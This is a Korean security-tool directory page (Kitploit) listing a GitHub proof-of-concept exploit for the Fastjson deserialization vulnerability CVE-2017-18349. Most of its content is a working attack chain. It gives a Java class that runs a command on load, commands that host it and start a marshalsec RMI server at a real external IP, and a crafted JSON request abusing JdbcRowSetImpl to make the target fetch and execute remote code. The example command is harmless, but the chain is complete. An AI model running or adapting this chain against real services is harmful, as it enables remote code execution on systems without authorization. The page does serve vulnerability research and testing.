Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Fastjson--CVE-2017-18349- — Fastjson CVE-2017-18349 역직렬화 취약점에 대한 개념 증명 익스플로잇으로, 조작된 JSON 페이로드와 RMI 서버를 통한 원격 코드 실행을 시연합니다. | Kitploit
도구/GitHubGitHub/h0cksr/fastjson--cve-2017-18349-
Vulnerability AnalysisExploitationWeb Application ExploitationCommand and ControlRemote Access ToolPayload Development
GitHubh0cksr/fastjson--cve-2017-18349-

Fastjson--CVE-2017-18349-

Fastjson CVE-2017-18349 역직렬화 취약점에 대한 개념 증명 익스플로잇으로, 조작된 JSON 페이로드와 RMI 서버를 통한 원격 코드 실행을 시연합니다.

저장소 보기
24년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Fastjson--CVE-2017-18349-변경 취소

프로젝트를 Maven 프로젝트로 설정한 후 실행(참고: 높은 버전의 JDK를 사용하면 실패할 수 있으므로 JDK 1.8.65 버전을 사용하는 것이 좋습니다.) FastjsondemoApplication.java의 main 함수를 실행하면 됩니다. TouchFile.java 파일

root@kitploit:~
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
  static {
      try {
          Runtime rt = Runtime.getRuntime();
          String[] commands = {"touch", "/tmp/flag_test"};
          Process pc = rt.exec(commands);
          pc.waitFor();
      } catch (Exception e) {
          // do nothing
      }
  }
}

그 후 동일하게 버전 8의 javac로 컴파일하여 class 파일로 만듭니다.

root@kitploit:~
javac TouchFile.java

Python으로 웹 서비스를 시작합니다.

root@kitploit:~
python -m SimpleHTTPServer 80

marshalsec을 사용하여 RMIServer를 생성합니다.

root@kitploit:~
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://47.99.70.18/#TouchFile" 9999

요청 패킷을 수정합니다.

root@kitploit:~
POST / HTTP/1.1
Host: 127.0.0.1:8080

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://47.99.70.18:9999/TouchFile",
        "autoCommit":true
    }
}

효과: 이미지

도구 다운로드